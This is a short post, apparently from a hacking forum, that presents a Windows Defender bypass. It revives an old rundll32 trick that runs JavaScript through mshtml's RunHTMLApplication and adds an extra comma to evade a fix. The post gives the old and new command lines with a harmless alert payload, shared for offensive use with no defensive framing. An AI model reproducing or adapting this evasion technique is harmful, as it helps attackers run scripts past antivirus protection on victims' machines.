• We are an English-only forum. Selling threads should have samples, or permanent ban.

Windows Defender Detection Mitigation Bypass Vulnerability

nikoloz1337

Second Lieutenant
RaidForum.co
Joined
Feb 13, 2024
Messages
3
Reaction score
0
Credits
0
Win LPE
In 2022 hyp3rlinx told how to bypass windows defender by passing an additional path when referencing mshtml, the hole was fixed. BUT, adding a couple of commas to the old trick - and bypass again.
*
I mean, it was and it was fixed:
C:\sec>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";alert(666)
comma magic:
C:\sec>rundll32.exe javascript:"\..\..\..\mshtml,,RunHTMLApplication ";alert(666)
The dog is old, the tricks are new.
No CVE yet )
 
Back
Top Bottom